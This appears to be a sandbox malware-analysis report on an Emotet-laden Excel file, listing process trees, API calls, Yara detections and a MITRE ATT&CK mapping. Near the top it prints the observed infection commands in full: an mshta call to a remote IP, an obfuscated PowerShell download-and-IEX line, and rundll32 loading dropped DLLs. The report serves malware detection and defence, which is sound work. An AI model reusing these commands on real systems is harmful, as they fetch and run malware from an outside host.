                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmdJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKatJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKatJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufPJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServerJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbrJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServerJump to behavior
                            Source: Yara matchFile source: DOCUMENT_2801.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,13_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,13_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,13_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003DAA7 cpuid 11_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,11_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,11_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,11_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\Milossd.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		2
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
